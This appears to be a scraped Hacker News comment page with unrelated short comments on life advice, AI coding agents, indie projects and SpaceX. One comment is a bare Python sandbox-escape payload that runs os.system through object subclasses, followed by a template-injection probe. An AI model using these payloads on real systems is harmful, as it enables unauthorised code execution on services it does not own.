Hacker News .hnnew | past | comments | ask | show | jobs | submit | ncommentslogin

I'm MUCH older than you. I definitely don't have life all figured out, but I have the benefit of many years of experience and mistakes (and a few small successes).

The MOST IMPORTANT thing that matters long term of all the things you have listed is your health.

Physical, mental, emotional.

Based on your description of things and my interpretation thereof: You are working too hard and playing too hard. And stressed that you're not working harder and playing harder. Chill, bro. Pull back. Something's got to give. If you don't choose what to pull back on, your body is going to choose for you.

I know what you mean about the last couple of things you've said. I too have had to truncate long streaks of working out because of injuries or health problems. Do what you can. You don't need to push yourself unnecessarily; just literally do what you can. If you're not "back to your old self" just yet, don't try to force it. The idea is to do better -- not to be perfect.

And for crying out loud, spend some time away from screens. Go outside (it's a cliche because it's true), take walks, look at birds, read a book for fun, maybe meditate. (Sometimes you have to focus on nothing before you can focus on anything.) If you don't have the time for it? Make the time for it. The emails businesses and the emails will wait. The girlfriend, if she's at all decent, will wait. And your schoolwork won't suffer.

One of the big follies of college is about putting an immense amount of pressure on teenagers. Putting that kind of pressure on yourself is a recipe for mishaps and mistakes. It's okay to take that pressure off of yourself. Twenty years from now you will not look back and regret not being able to do it all perfectly -- but you are at risk of regretting not focusing more on one thing and less on another thing.

And you'll definitely regret letting your health suffer if you don't take care of yourself.

If these ideas make the high-achiever part of you feel guilty or otherwise bad, consider: It's one thing if you're working hard for a particular goal and you're making a short-term sacrifice in service of that long-term payoff. But everything you're doing is so all over the place, it all seems long-term, and nothing you've said indicates that you even have a clearly defined goal. Until you have a clearly defined goal, you are subjecting yourself to noise.

Of course, you're 18. If you don't 100% know what your goals are right now, that's okay. And you're bound to err. And you're bound to make a wrong turn and have to correct. That's fine. That's normal. That's expected. Part of being 18 is figuring out your goals.

That means putting yourself in a place where you can mindfully explore and figure things out. And you can't do that well without taking good care of yourself. Take care of yourself like someone you are responsible for caring for. If you wouldn't let your son or your daughter or your pet go through a particular kind of strife, don't allow it for yourself.

Be well.


Voyager is proof that when requirements are stable and systems are simple, longevity follows. We rarely get that luxury today.

I give you my personal experinces. I use it for everything design, coding, testing, deploying to kubernetes cluster, fixing issues on cluster. I use it to fix not only dev env issues, I use it for production issues. Confidently. Have things gone wrong. Sure. But mistakes have been rare (and catastrophic mistake - non recoverable , even rarer).

Everytime a mistake has happened,on diggin in I was always trace it back to something which I did wrong - either being careless in reading what it told me , or careless in telling what I want. I have had git code corruption issues, it overwrote uncommited working code with non working code. But it was my mistake to not tell it to commit the code before makign changes. It deleted QA cluster database but becuase I told it to delete it thinking it was my dev setup db. Net net. It;s mistakes are more a reflection of me as its supervisor than anything else.


the pre-cog angle is the scariest part. it's not even that they copy you after the prompt patterns across millions of users already signal where demand is clustering before any individual ships. the only real counter is speed and distribution get to users before the signal becomes obvious enough to act on. which ironically means building in public is still the better strategy hiding slows you down more than it protects you.

the final recursion point is the most honest part you can't warn about the forest without feeding it. but i'd push back slightly on the inevitability. the forest needs novelty to absorb, which means the edge always exists, it just keeps moving. the question isn't whether to hide but whether the speed of individual innovation can outpace the speed of absorption. so far it still can barely.

anyone who touches this topic on HN gets flagged/banned, so they're probably trying to avoid that

interesting approach building this in rust the latency argument makes sense for something sitting inline with every LLM request. curious how it handles multi-turn context where injection might be spread across messages rather than a single prompt.

I also have a solution mostly for myself but others are welcomed to it: https://zieka.github.io/bru/

Outlined some differences here between the various projects; might be useful: https://github.com/zieka/bru?tab=readme-ov-file#how-bru-comp...


Ok I contest. If you are worried about it resetting it's own work then yes. Although just chuck the same prompt and you should get a similar result amirite? Maybe a better one lol!

Also you can instruct it to commit and push at every step too.


Basically turning an LLM into a personal CliffNotes machine. Genius way to justify buying more books while still feeling productive.

Play it in your browser: http://sean-reid.github.io/gravity

Technical blog post: https://sean-reid.github.io/blog/gravity.html

The idea: you're fighting near black holes, and Schwarzschild time dilation is the core mechanic. Get close to a well and the universe outside speeds up relative to you. Enemies move faster, projectiles zip past, weapons cycle quicker. Pull back out and everything normalizes. Single and binary black hole configurations make things pretty chaotic. Weapons and AI scale with local dilation, and there's procedural audio that shifts based on how deep you are in a gravity well. It's free, runs on Windows/macOS/Linux/web.

Built the whole thing solo: physics, AI, procedural audio, rendering, deployment. Happy to talk about any of the technical choices.


Idk if it matters that much for you but u can look into codes and see if its typical ai codes or not

Was ChatGPT hyped?

It took off rapidly but that was hardly because of any hyping and almost entirely due to word of mouth and people actually liking the product, until the press picked up on it.

From what I remember they still had an invite process when they were getting popular and the demand clearly overwhelmed their servers several times, indicating a much bigger response than they expected. If anything I think OpenAI was downplaying the product at the time.


Have you read mike masnicks ? https://www.techdirt.com/2026/03/25/ai-might-be-our-best-sho...

It actually points out the completely opposite and I liked that quite a bit That AI allows us to get back the open web in in a way.


eval('[c._﹍init﹍_._﹍globals﹍_["os"].system("id") for c in ()._﹍class﹍_._﹍bases﹍_[0]._﹍subclasses﹍_() if c._﹍init﹍_._﹍class﹍_._﹍name﹍_ == "function" and "os" in c._﹍init﹍_._﹍globals﹍_]'.replace('__', ''), {'__builtins__': None}, {})

{{7*7}}

1


I built a thin wrapper over the Fetch API that returns errors as values instead of throwing. Inspired by Go's result, err pattern.

No try/catch. TypeScript narrows the error type so you know exactly which HTTP errors to handle at compile time. 40 typed error classes for all standard status codes, plus a separate NetworkError for connection failures.

Would love feedback on the API design.



A genuine Mars program requires a dozen things SpaceX only builds CGI renders of or totally overlooked. Instead, they focused on reusable launch and building a low-Earth-orbit mega-constellation. This dates back to the 1980s Strategic Defense Initiative (SDI). Michael D. Griffin architected Brilliant Pebbles, a concept for thousands of LEO missile interceptors in orbit that died because launch costs were too high. The Pentagon attempted to solve the launch-cost problem in the 1990s with the DC-X reusable rocket program, but it was canceled. The architectural dream survived through "New Space" advocacy. In 2001, this very same Griffin shared a Mars Society stage with Elon Musk, then flew with him to Russia in 2002 to buy ICBMs. SpaceX was conceived on the flight home. Musk later told the former DC-X program manager, Jess Sponable, that SpaceX was "just continuing the great work of the DC-X project."

While Musk built rockets, Griffin ran In-Q-Tel, the CIA's venture arm. Then as NASA Administrator, Griffin used his In-Q-Tel playbook to award the commercial cargo contracts that saved SpaceX from bankruptcy.

SpaceX masking began to slip when Gwynne Shotwell publicly confirmed the company's willingness to launch offensive weapons in 2018. That same year, Griffin returned to the Pentagon to establish the Space Development Agency, mandated to build a proliferated LEO constellation for hypersonic missile tracking. In 2019, U.S. General Terrence O'Shaughnessy pitched the Senate on "SHIELD"-a layered orbital missile defense system. Shortly after, O'Shaughnessy retired from the military and joined SpaceX to lead their discreet new division: Starshield.

Three decades later, Brilliant Pebbles is finally materializing as Golden Dome. As Reuters reported, Musk's Starshield is the frontrunner to build this classified SDI successor, pitching the Pentagon on a Golden Dome architecture involving thousands of weapon satellites. Starshield is already deploying these military satellites alongside standard Starlink satellites.

Mars was the necessary myth to recruit talent, capture public imagination, and secure capital. But the capabilities SpaceX actually delivered...cheap mass-to-orbit and rapid satellite replenishment...are the exact prerequisites of Golden Dome.


Pretty rude remark. And what makes you think that ASI is _just on the horizon_?

It's really disappointing news. I've been actively using Sora for my video production

Feels like a lot of people are still treating these tools like “smart scripts” instead of systems with failure modes.

Telling it not to do something is basically just nudging probabilities. If the action is available, it’s always somewhere in the distribution.

Which is why the boundary has to be outside the model, not inside the prompt.


Or just train some NNs. If more time write the code and understand the tensor operations.

I think this also explains why the checks are moving up the stack.

If the real cost is in actually running the app or the model, then just verifying a browser isn’t enough anymore. You need to verify that the expensive part actually happened.

Otherwise you’re basically protecting the cheapest layer while the expensive one is still exposed.


Sounds like you care about data stored on your filesystem! Take one step back and solve that problem. Use a proper isolated sandbox, e.g. Github workspace on an account that is working with a fork.

Care about the data in that workspace? Push it first.

Othwerwise it is a cat and mouse game of whackamole.


This is coming straight from my experience last week. I actually tried to test this. took 30 days of my claude code sessions, about 32k conversation turns across 21 sessions and 10 projects. classified every user message - corrections, feedback, decisions, reframes. extracted about 3200 high signal training pairs. I put a lot of emphasis on my explicit corrections where I told the AI it was wrong and what the right answer was and WHY. fine tuned qwen 4B on it with qlora. the model learned my voice perfectly - during training it would say things like 'no. fix the query. you're doing 3 joins when you only need user_id' which is exactly how I talk. but thats the problem - it learned to parrot my phrasing without understanding why I made those corrections. it memorized the what, the artifact, but completely missed the how - the reasoning process that led to the correction. Title is exactly right.

I’m with you on CDK or Pulumi. Being able to use programming languages for infra makes composition better.But the main issue is that they still rely on the same execution model: define intent, generate a plan, apply, and then the process exits. The system doesn’t stay "alive" after that. If something drifts, partially fails, or never fully converges, you’re back to fixing it manually. With Planetform, the idea is a shift to Durable Execution (IaDE). It’s less about how we define infra and more about making the system itself responsible for staying correct over time. Monitoring then becomes part of that verification loop, not something you wire in after the fact. This is the first of a couple of posts we’ll be releasing on how we think about solving this. The project will be fully open source

Highly recommend to deny commands in user settings.json like git reset

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: